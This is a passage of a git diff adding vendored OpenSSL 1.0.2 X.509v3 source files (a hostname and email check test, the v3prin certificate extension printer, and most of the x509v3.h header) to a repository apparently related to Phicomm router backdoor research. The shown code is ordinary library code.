+        int samename = strcasecmp(nameincert, *pname) == 0;
+        size_t namelen = strlen(*pname);
+        char *name = malloc(namelen);
+        int match, ret;
+        memcpy(name, *pname, namelen);
+
+        ret = X509_check_host(crt, name, namelen, 0, NULL);
+        match = -1;
+        if (ret < 0) {
+            fprintf(stderr, "internal error in X509_check_host");
+            ++errors;
+        } else if (fn->host) {
+            if (ret == 1 && !samename)
+                match = 1;
+            if (ret == 0 && samename)
+                match = 0;
+        } else if (ret == 1)
+            match = 1;
+        check_message(fn, "host", nameincert, match, *pname);
+
+        ret = X509_check_host(crt, name, namelen,
+                              X509_CHECK_FLAG_NO_WILDCARDS, NULL);
+        match = -1;
+        if (ret < 0) {
+            fprintf(stderr, "internal error in X509_check_host");
+            ++errors;
+        } else if (fn->host) {
+            if (ret == 1 && !samename)
+                match = 1;
+            if (ret == 0 && samename)
+                match = 0;
+        } else if (ret == 1)
+            match = 1;
+        check_message(fn, "host-no-wildcards", nameincert, match, *pname);
+
+        ret = X509_check_email(crt, name, namelen, 0);
+        match = -1;
+        if (fn->email) {
+            if (ret && !samename)
+                match = 1;
+            if (!ret && samename && strchr(nameincert, '@') != NULL)
+                match = 0;
+        } else if (ret)
+            match = 1;
+        check_message(fn, "email", nameincert, match, *pname);
+        ++pname;
+        free(name);
+    }
+}
+
+int main(void)
+{
+    const struct set_name_fn *pfn = name_fns;
+    while (pfn->name) {
+        const char *const *pname = names;
+        while (*pname) {
+            X509 *crt = make_cert();
+            if (crt == NULL) {
+                fprintf(stderr, "make_cert failed\n");
+                return 1;
+            }
+            if (!pfn->fn(crt, *pname)) {
+                fprintf(stderr, "X509 name setting failed\n");
+                return 1;
+            }
+            run_cert(crt, *pname, pfn);
+            X509_free(crt);
+            ++pname;
+        }
+        ++pfn;
+    }
+    return errors > 0 ? 1 : 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3prin.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3prin.c
new file mode 100644
index 0000000..cbc3570
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3prin.c
@@ -0,0 +1,99 @@
+/* v3prin.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/asn1.h>
+#include <openssl/conf.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+int main(int argc, char **argv)
+{
+    X509 *cert;
+    FILE *inf;
+    int i, count;
+    X509_EXTENSION *ext;
+    X509V3_add_standard_extensions();
+    ERR_load_crypto_strings();
+    if (!argv[1]) {
+        fprintf(stderr, "Usage v3prin cert.pem\n");
+        exit(1);
+    }
+    if (!(inf = fopen(argv[1], "r"))) {
+        fprintf(stderr, "Can't open %s\n", argv[1]);
+        exit(1);
+    }
+    if (!(cert = PEM_read_X509(inf, NULL, NULL))) {
+        fprintf(stderr, "Can't read certificate %s\n", argv[1]);
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+    fclose(inf);
+    count = X509_get_ext_count(cert);
+    printf("%d extensions\n", count);
+    for (i = 0; i < count; i++) {
+        ext = X509_get_ext(cert, i);
+        printf("%s\n", OBJ_nid2ln(OBJ_obj2nid(ext->object)));
+        if (!X509V3_EXT_print_fp(stdout, ext, 0, 0))
+            ERR_print_errors_fp(stderr);
+        printf("\n");
+
+    }
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/x509v3.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/x509v3.h
new file mode 100644
index 0000000..f5c6156
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/x509v3.h
@@ -0,0 +1,1055 @@
+/* x509v3.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef HEADER_X509V3_H
+# define HEADER_X509V3_H
+
+# include <openssl/bio.h>
+# include <openssl/x509.h>
+# include <openssl/conf.h>
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_SYS_WIN32
+/* Under Win32 these are defined in wincrypt.h */
+#  undef X509_NAME
+#  undef X509_CERT_PAIR
+#  undef X509_EXTENSIONS
+# endif
+
+/* Forward reference */
+struct v3_ext_method;
+struct v3_ext_ctx;
+
+/* Useful typedefs */
+
+typedef void *(*X509V3_EXT_NEW)(void);
+typedef void (*X509V3_EXT_FREE) (void *);
+typedef void *(*X509V3_EXT_D2I)(void *, const unsigned char **, long);
+typedef int (*X509V3_EXT_I2D) (void *, unsigned char **);
+typedef STACK_OF(CONF_VALUE) *
+    (*X509V3_EXT_I2V) (const struct v3_ext_method *method, void *ext,
+                       STACK_OF(CONF_VALUE) *extlist);
+typedef void *(*X509V3_EXT_V2I)(const struct v3_ext_method *method,
+                                struct v3_ext_ctx *ctx,
+                                STACK_OF(CONF_VALUE) *values);
+typedef char *(*X509V3_EXT_I2S)(const struct v3_ext_method *method,
+                                void *ext);
+typedef void *(*X509V3_EXT_S2I)(const struct v3_ext_method *method,
+                                struct v3_ext_ctx *ctx, const char *str);
+typedef int (*X509V3_EXT_I2R) (const struct v3_ext_method *method, void *ext,
+                               BIO *out, int indent);
+typedef void *(*X509V3_EXT_R2I)(const struct v3_ext_method *method,
+                                struct v3_ext_ctx *ctx, const char *str);
+
+/* V3 extension structure */
+
+struct v3_ext_method {
+    int ext_nid;
+    int ext_flags;
+/* If this is set the following four fields are ignored */
+    ASN1_ITEM_EXP *it;
+/* Old style ASN1 calls */
+    X509V3_EXT_NEW ext_new;
+    X509V3_EXT_FREE ext_free;
+    X509V3_EXT_D2I d2i;
+    X509V3_EXT_I2D i2d;
+/* The following pair is used for string extensions */
+    X509V3_EXT_I2S i2s;
+    X509V3_EXT_S2I s2i;
+/* The following pair is used for multi-valued extensions */
+    X509V3_EXT_I2V i2v;
+    X509V3_EXT_V2I v2i;
+/* The following are used for raw extensions */
+    X509V3_EXT_I2R i2r;
+    X509V3_EXT_R2I r2i;
+    void *usr_data;             /* Any extension specific data */
+};
+
+typedef struct X509V3_CONF_METHOD_st {
+    char *(*get_string) (void *db, char *section, char *value);
+    STACK_OF(CONF_VALUE) *(*get_section) (void *db, char *section);
+    void (*free_string) (void *db, char *string);
+    void (*free_section) (void *db, STACK_OF(CONF_VALUE) *section);
+} X509V3_CONF_METHOD;
+
+/* Context specific info */
+struct v3_ext_ctx {
+# define CTX_TEST 0x1
+    int flags;
+    X509 *issuer_cert;
+    X509 *subject_cert;
+    X509_REQ *subject_req;
+    X509_CRL *crl;
+    X509V3_CONF_METHOD *db_meth;
+    void *db;
+/* Maybe more here */
+};
+
+typedef struct v3_ext_method X509V3_EXT_METHOD;
+
+DECLARE_STACK_OF(X509V3_EXT_METHOD)
+
+/* ext_flags values */
+# define X509V3_EXT_DYNAMIC      0x1
+# define X509V3_EXT_CTX_DEP      0x2
+# define X509V3_EXT_MULTILINE    0x4
+
+typedef BIT_STRING_BITNAME ENUMERATED_NAMES;
+
+typedef struct BASIC_CONSTRAINTS_st {
+    int ca;
+    ASN1_INTEGER *pathlen;
+} BASIC_CONSTRAINTS;
+
+typedef struct PKEY_USAGE_PERIOD_st {
+    ASN1_GENERALIZEDTIME *notBefore;
+    ASN1_GENERALIZEDTIME *notAfter;
+} PKEY_USAGE_PERIOD;
+
+typedef struct otherName_st {
+    ASN1_OBJECT *type_id;
+    ASN1_TYPE *value;
+} OTHERNAME;
+
+typedef struct EDIPartyName_st {
+    ASN1_STRING *nameAssigner;
+    ASN1_STRING *partyName;
+} EDIPARTYNAME;
+
+typedef struct GENERAL_NAME_st {
+# define GEN_OTHERNAME   0
+# define GEN_EMAIL       1
+# define GEN_DNS         2
+# define GEN_X400        3
+# define GEN_DIRNAME     4
+# define GEN_EDIPARTY    5
+# define GEN_URI         6
+# define GEN_IPADD       7
+# define GEN_RID         8
+    int type;
+    union {
+        char *ptr;
+        OTHERNAME *otherName;   /* otherName */
+        ASN1_IA5STRING *rfc822Name;
+        ASN1_IA5STRING *dNSName;
+        ASN1_TYPE *x400Address;
+        X509_NAME *directoryName;
+        EDIPARTYNAME *ediPartyName;
+        ASN1_IA5STRING *uniformResourceIdentifier;
+        ASN1_OCTET_STRING *iPAddress;
+        ASN1_OBJECT *registeredID;
+        /* Old names */
+        ASN1_OCTET_STRING *ip;  /* iPAddress */
+        X509_NAME *dirn;        /* dirn */
+        ASN1_IA5STRING *ia5;    /* rfc822Name, dNSName,
+                                 * uniformResourceIdentifier */
+        ASN1_OBJECT *rid;       /* registeredID */
+        ASN1_TYPE *other;       /* x400Address */
+    } d;
+} GENERAL_NAME;
+
+typedef STACK_OF(GENERAL_NAME) GENERAL_NAMES;
+
+typedef struct ACCESS_DESCRIPTION_st {
+    ASN1_OBJECT *method;
+    GENERAL_NAME *location;
+} ACCESS_DESCRIPTION;
+
+typedef STACK_OF(ACCESS_DESCRIPTION) AUTHORITY_INFO_ACCESS;
+
+typedef STACK_OF(ASN1_OBJECT) EXTENDED_KEY_USAGE;
+
+DECLARE_STACK_OF(GENERAL_NAME)
+DECLARE_ASN1_SET_OF(GENERAL_NAME)
+
+DECLARE_STACK_OF(ACCESS_DESCRIPTION)
+DECLARE_ASN1_SET_OF(ACCESS_DESCRIPTION)
+
+typedef struct DIST_POINT_NAME_st {
+    int type;
+    union {
+        GENERAL_NAMES *fullname;
+        STACK_OF(X509_NAME_ENTRY) *relativename;
+    } name;
+/* If relativename then this contains the full distribution point name */
+    X509_NAME *dpname;
+} DIST_POINT_NAME;
+/* All existing reasons */
+# define CRLDP_ALL_REASONS       0x807f
+
+# define CRL_REASON_NONE                         -1
+# define CRL_REASON_UNSPECIFIED                  0
+# define CRL_REASON_KEY_COMPROMISE               1
+# define CRL_REASON_CA_COMPROMISE                2
+# define CRL_REASON_AFFILIATION_CHANGED          3
+# define CRL_REASON_SUPERSEDED                   4
+# define CRL_REASON_CESSATION_OF_OPERATION       5
+# define CRL_REASON_CERTIFICATE_HOLD             6
+# define CRL_REASON_REMOVE_FROM_CRL              8
+# define CRL_REASON_PRIVILEGE_WITHDRAWN          9
+# define CRL_REASON_AA_COMPROMISE                10
+
+struct DIST_POINT_st {
+    DIST_POINT_NAME *distpoint;
+    ASN1_BIT_STRING *reasons;
+    GENERAL_NAMES *CRLissuer;
+    int dp_reasons;
+};
+
+typedef STACK_OF(DIST_POINT) CRL_DIST_POINTS;
+
+DECLARE_STACK_OF(DIST_POINT)
+DECLARE_ASN1_SET_OF(DIST_POINT)
+
+struct AUTHORITY_KEYID_st {
+    ASN1_OCTET_STRING *keyid;
+    GENERAL_NAMES *issuer;
+    ASN1_INTEGER *serial;
+};
+
+/* Strong extranet structures */
+
+typedef struct SXNET_ID_st {
+    ASN1_INTEGER *zone;
+    ASN1_OCTET_STRING *user;
+} SXNETID;
+
+DECLARE_STACK_OF(SXNETID)
+DECLARE_ASN1_SET_OF(SXNETID)
+
+typedef struct SXNET_st {
+    ASN1_INTEGER *version;
+    STACK_OF(SXNETID) *ids;
+} SXNET;
+
+typedef struct NOTICEREF_st {
+    ASN1_STRING *organization;
+    STACK_OF(ASN1_INTEGER) *noticenos;
+} NOTICEREF;
+
+typedef struct USERNOTICE_st {
+    NOTICEREF *noticeref;
+    ASN1_STRING *exptext;
+} USERNOTICE;
+
+typedef struct POLICYQUALINFO_st {
+    ASN1_OBJECT *pqualid;
+    union {
+        ASN1_IA5STRING *cpsuri;
+        USERNOTICE *usernotice;
+        ASN1_TYPE *other;
+    } d;
+} POLICYQUALINFO;
+
+DECLARE_STACK_OF(POLICYQUALINFO)
+DECLARE_ASN1_SET_OF(POLICYQUALINFO)
+
+typedef struct POLICYINFO_st {
+    ASN1_OBJECT *policyid;
+    STACK_OF(POLICYQUALINFO) *qualifiers;
+} POLICYINFO;
+
+typedef STACK_OF(POLICYINFO) CERTIFICATEPOLICIES;
+
+DECLARE_STACK_OF(POLICYINFO)
+DECLARE_ASN1_SET_OF(POLICYINFO)
+
+typedef struct POLICY_MAPPING_st {
+    ASN1_OBJECT *issuerDomainPolicy;
+    ASN1_OBJECT *subjectDomainPolicy;
+} POLICY_MAPPING;
+
+DECLARE_STACK_OF(POLICY_MAPPING)
+
+typedef STACK_OF(POLICY_MAPPING) POLICY_MAPPINGS;
+
+typedef struct GENERAL_SUBTREE_st {
+    GENERAL_NAME *base;
+    ASN1_INTEGER *minimum;
+    ASN1_INTEGER *maximum;
+} GENERAL_SUBTREE;
+
+DECLARE_STACK_OF(GENERAL_SUBTREE)
+
+struct NAME_CONSTRAINTS_st {
+    STACK_OF(GENERAL_SUBTREE) *permittedSubtrees;
+    STACK_OF(GENERAL_SUBTREE) *excludedSubtrees;
+};
+
+typedef struct POLICY_CONSTRAINTS_st {
+    ASN1_INTEGER *requireExplicitPolicy;
+    ASN1_INTEGER *inhibitPolicyMapping;
+} POLICY_CONSTRAINTS;
+
+/* Proxy certificate structures, see RFC 3820 */
+typedef struct PROXY_POLICY_st {
+    ASN1_OBJECT *policyLanguage;
+    ASN1_OCTET_STRING *policy;
+} PROXY_POLICY;
+
+typedef struct PROXY_CERT_INFO_EXTENSION_st {
+    ASN1_INTEGER *pcPathLengthConstraint;
+    PROXY_POLICY *proxyPolicy;
+} PROXY_CERT_INFO_EXTENSION;
+
+DECLARE_ASN1_FUNCTIONS(PROXY_POLICY)
+DECLARE_ASN1_FUNCTIONS(PROXY_CERT_INFO_EXTENSION)
+
+struct ISSUING_DIST_POINT_st {
+    DIST_POINT_NAME *distpoint;
+    int onlyuser;
+    int onlyCA;
+    ASN1_BIT_STRING *onlysomereasons;
+    int indirectCRL;
+    int onlyattr;
+};
+
+/* Values in idp_flags field */
+/* IDP present */
+# define IDP_PRESENT     0x1
+/* IDP values inconsistent */
+# define IDP_INVALID     0x2
+/* onlyuser true */
+# define IDP_ONLYUSER    0x4
+/* onlyCA true */
+# define IDP_ONLYCA      0x8
+/* onlyattr true */
+# define IDP_ONLYATTR    0x10
+/* indirectCRL true */
+# define IDP_INDIRECT    0x20
+/* onlysomereasons present */
+# define IDP_REASONS     0x40
+
+# define X509V3_conf_err(val) ERR_add_error_data(6, "section:", val->section, \
+",name:", val->name, ",value:", val->value);
+
+# define X509V3_set_ctx_test(ctx) \
+                        X509V3_set_ctx(ctx, NULL, NULL, NULL, NULL, CTX_TEST)
+# define X509V3_set_ctx_nodb(ctx) (ctx)->db = NULL;
+
+# define EXT_BITSTRING(nid, table) { nid, 0, ASN1_ITEM_ref(ASN1_BIT_STRING), \
+                        0,0,0,0, \
+                        0,0, \
+                        (X509V3_EXT_I2V)i2v_ASN1_BIT_STRING, \
+                        (X509V3_EXT_V2I)v2i_ASN1_BIT_STRING, \
+                        NULL, NULL, \
+                        table}
+
+# define EXT_IA5STRING(nid) { nid, 0, ASN1_ITEM_ref(ASN1_IA5STRING), \
+                        0,0,0,0, \
+                        (X509V3_EXT_I2S)i2s_ASN1_IA5STRING, \
+                        (X509V3_EXT_S2I)s2i_ASN1_IA5STRING, \
+                        0,0,0,0, \
+                        NULL}
+
+# define EXT_END { -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}
+
+/* X509_PURPOSE stuff */
+
+# define EXFLAG_BCONS            0x1
+# define EXFLAG_KUSAGE           0x2
+# define EXFLAG_XKUSAGE          0x4
+# define EXFLAG_NSCERT           0x8
+
+# define EXFLAG_CA               0x10
+/* Really self issued not necessarily self signed */
+# define EXFLAG_SI               0x20
+# define EXFLAG_V1               0x40
+# define EXFLAG_INVALID          0x80
+# define EXFLAG_SET              0x100
+# define EXFLAG_CRITICAL         0x200
+# define EXFLAG_PROXY            0x400
+
+# define EXFLAG_INVALID_POLICY   0x800
+# define EXFLAG_FRESHEST         0x1000
+/* Self signed */
+# define EXFLAG_SS               0x2000
+
+# define KU_DIGITAL_SIGNATURE    0x0080
+# define KU_NON_REPUDIATION      0x0040
+# define KU_KEY_ENCIPHERMENT     0x0020
+# define KU_DATA_ENCIPHERMENT    0x0010
+# define KU_KEY_AGREEMENT        0x0008
+# define KU_KEY_CERT_SIGN        0x0004
+# define KU_CRL_SIGN             0x0002
+# define KU_ENCIPHER_ONLY        0x0001
+# define KU_DECIPHER_ONLY        0x8000
+
+# define NS_SSL_CLIENT           0x80
+# define NS_SSL_SERVER           0x40
+# define NS_SMIME                0x20
+# define NS_OBJSIGN              0x10
+# define NS_SSL_CA               0x04
+# define NS_SMIME_CA             0x02
+# define NS_OBJSIGN_CA           0x01
+# define NS_ANY_CA               (NS_SSL_CA|NS_SMIME_CA|NS_OBJSIGN_CA)
+
+# define XKU_SSL_SERVER          0x1
+# define XKU_SSL_CLIENT          0x2
+# define XKU_SMIME               0x4
+# define XKU_CODE_SIGN           0x8
+# define XKU_SGC                 0x10
+# define XKU_OCSP_SIGN           0x20
+# define XKU_TIMESTAMP           0x40
+# define XKU_DVCS                0x80
+# define XKU_ANYEKU              0x100
+
+# define X509_PURPOSE_DYNAMIC    0x1
+# define X509_PURPOSE_DYNAMIC_NAME       0x2
+
+typedef struct x509_purpose_st {
+    int purpose;
+    int trust;                  /* Default trust ID */
+    int flags;
+    int (*check_purpose) (const struct x509_purpose_st *, const X509 *, int);
+    char *name;
+    char *sname;
+    void *usr_data;
+} X509_PURPOSE;
+
+# define X509_PURPOSE_SSL_CLIENT         1
+# define X509_PURPOSE_SSL_SERVER         2
+# define X509_PURPOSE_NS_SSL_SERVER      3
+# define X509_PURPOSE_SMIME_SIGN         4
+# define X509_PURPOSE_SMIME_ENCRYPT      5
+# define X509_PURPOSE_CRL_SIGN           6
+# define X509_PURPOSE_ANY                7
+# define X509_PURPOSE_OCSP_HELPER        8
+# define X509_PURPOSE_TIMESTAMP_SIGN     9
+
+# define X509_PURPOSE_MIN                1
+# define X509_PURPOSE_MAX                9
+
+/* Flags for X509V3_EXT_print() */
+
+# define X509V3_EXT_UNKNOWN_MASK         (0xfL << 16)
+/* Return error for unknown extensions */
+# define X509V3_EXT_DEFAULT              0
+/* Print error for unknown extensions */
+# define X509V3_EXT_ERROR_UNKNOWN        (1L << 16)
+/* ASN1 parse unknown extensions */
+# define X509V3_EXT_PARSE_UNKNOWN        (2L << 16)
+/* BIO_dump unknown extensions */
+# define X509V3_EXT_DUMP_UNKNOWN         (3L << 16)
+
+/* Flags for X509V3_add1_i2d */
+
+# define X509V3_ADD_OP_MASK              0xfL
+# define X509V3_ADD_DEFAULT              0L
+# define X509V3_ADD_APPEND               1L
+# define X509V3_ADD_REPLACE              2L
+# define X509V3_ADD_REPLACE_EXISTING     3L
+# define X509V3_ADD_KEEP_EXISTING        4L
+# define X509V3_ADD_DELETE               5L
+# define X509V3_ADD_SILENT               0x10
+
+DECLARE_STACK_OF(X509_PURPOSE)
+
+DECLARE_ASN1_FUNCTIONS(BASIC_CONSTRAINTS)
+
+DECLARE_ASN1_FUNCTIONS(SXNET)
+DECLARE_ASN1_FUNCTIONS(SXNETID)
+
+int SXNET_add_id_asc(SXNET **psx, char *zone, char *user, int userlen);
+int SXNET_add_id_ulong(SXNET **psx, unsigned long lzone, char *user,
+                       int userlen);
+int SXNET_add_id_INTEGER(SXNET **psx, ASN1_INTEGER *izone, char *user,
+                         int userlen);
+
+ASN1_OCTET_STRING *SXNET_get_id_asc(SXNET *sx, char *zone);
+ASN1_OCTET_STRING *SXNET_get_id_ulong(SXNET *sx, unsigned long lzone);
+ASN1_OCTET_STRING *SXNET_get_id_INTEGER(SXNET *sx, ASN1_INTEGER *zone);
+
+DECLARE_ASN1_FUNCTIONS(AUTHORITY_KEYID)
+
+DECLARE_ASN1_FUNCTIONS(PKEY_USAGE_PERIOD)
+
+DECLARE_ASN1_FUNCTIONS(GENERAL_NAME)
+GENERAL_NAME *GENERAL_NAME_dup(GENERAL_NAME *a);
+int GENERAL_NAME_cmp(GENERAL_NAME *a, GENERAL_NAME *b);
+
+ASN1_BIT_STRING *v2i_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
+                                     X509V3_CTX *ctx,
+                                     STACK_OF(CONF_VALUE) *nval);
+STACK_OF(CONF_VALUE) *i2v_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
+                                          ASN1_BIT_STRING *bits,
+                                          STACK_OF(CONF_VALUE) *extlist);
+
+STACK_OF(CONF_VALUE) *i2v_GENERAL_NAME(X509V3_EXT_METHOD *method,
+                                       GENERAL_NAME *gen,
+                                       STACK_OF(CONF_VALUE) *ret);
+int GENERAL_NAME_print(BIO *out, GENERAL_NAME *gen);
+
+DECLARE_ASN1_FUNCTIONS(GENERAL_NAMES)
+
+STACK_OF(CONF_VALUE) *i2v_GENERAL_NAMES(X509V3_EXT_METHOD *method,
+                                        GENERAL_NAMES *gen,
+                                        STACK_OF(CONF_VALUE) *extlist);
+GENERAL_NAMES *v2i_GENERAL_NAMES(const X509V3_EXT_METHOD *method,
+                                 X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval);
+
+DECLARE_ASN1_FUNCTIONS(OTHERNAME)
+DECLARE_ASN1_FUNCTIONS(EDIPARTYNAME)
+int OTHERNAME_cmp(OTHERNAME *a, OTHERNAME *b);
+void GENERAL_NAME_set0_value(GENERAL_NAME *a, int type, void *value);
+void *GENERAL_NAME_get0_value(GENERAL_NAME *a, int *ptype);
+int GENERAL_NAME_set0_othername(GENERAL_NAME *gen,
+                                ASN1_OBJECT *oid, ASN1_TYPE *value);
+int GENERAL_NAME_get0_otherName(GENERAL_NAME *gen,
+                                ASN1_OBJECT **poid, ASN1_TYPE **pvalue);
+
+char *i2s_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method,
+                            ASN1_OCTET_STRING *ia5);
+ASN1_OCTET_STRING *s2i_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method,
+                                         X509V3_CTX *ctx, char *str);
+
+DECLARE_ASN1_FUNCTIONS(EXTENDED_KEY_USAGE)
+int i2a_ACCESS_DESCRIPTION(BIO *bp, ACCESS_DESCRIPTION *a);
+
+DECLARE_ASN1_FUNCTIONS(CERTIFICATEPOLICIES)
+DECLARE_ASN1_FUNCTIONS(POLICYINFO)
+DECLARE_ASN1_FUNCTIONS(POLICYQUALINFO)
+DECLARE_ASN1_FUNCTIONS(USERNOTICE)
+DECLARE_ASN1_FUNCTIONS(NOTICEREF)
+
+DECLARE_ASN1_FUNCTIONS(CRL_DIST_POINTS)
+DECLARE_ASN1_FUNCTIONS(DIST_POINT)
+DECLARE_ASN1_FUNCTIONS(DIST_POINT_NAME)
+DECLARE_ASN1_FUNCTIONS(ISSUING_DIST_POINT)
+
+int DIST_POINT_set_dpname(DIST_POINT_NAME *dpn, X509_NAME *iname);
+
+int NAME_CONSTRAINTS_check(X509 *x, NAME_CONSTRAINTS *nc);
+
+DECLARE_ASN1_FUNCTIONS(ACCESS_DESCRIPTION)
+DECLARE_ASN1_FUNCTIONS(AUTHORITY_INFO_ACCESS)
+
+DECLARE_ASN1_ITEM(POLICY_MAPPING)
+DECLARE_ASN1_ALLOC_FUNCTIONS(POLICY_MAPPING)
+DECLARE_ASN1_ITEM(POLICY_MAPPINGS)
+
+DECLARE_ASN1_ITEM(GENERAL_SUBTREE)
+DECLARE_ASN1_ALLOC_FUNCTIONS(GENERAL_SUBTREE)
+
+DECLARE_ASN1_ITEM(NAME_CONSTRAINTS)
+DECLARE_ASN1_ALLOC_FUNCTIONS(NAME_CONSTRAINTS)
+
+DECLARE_ASN1_ALLOC_FUNCTIONS(POLICY_CONSTRAINTS)
+DECLARE_ASN1_ITEM(POLICY_CONSTRAINTS)
+
+GENERAL_NAME *a2i_GENERAL_NAME(GENERAL_NAME *out,
+                               const X509V3_EXT_METHOD *method,
+                               X509V3_CTX *ctx, int gen_type, char *value,
+                               int is_nc);
+
+# ifdef HEADER_CONF_H
+GENERAL_NAME *v2i_GENERAL_NAME(const X509V3_EXT_METHOD *method,
+                               X509V3_CTX *ctx, CONF_VALUE *cnf);
+GENERAL_NAME *v2i_GENERAL_NAME_ex(GENERAL_NAME *out,
+                                  const X509V3_EXT_METHOD *method,
+                                  X509V3_CTX *ctx, CONF_VALUE *cnf,
+                                  int is_nc);
+void X509V3_conf_free(CONF_VALUE *val);
+
+X509_EXTENSION *X509V3_EXT_nconf_nid(CONF *conf, X509V3_CTX *ctx, int ext_nid,
+                                     char *value);
+X509_EXTENSION *X509V3_EXT_nconf(CONF *conf, X509V3_CTX *ctx, char *name,
+                                 char *value);
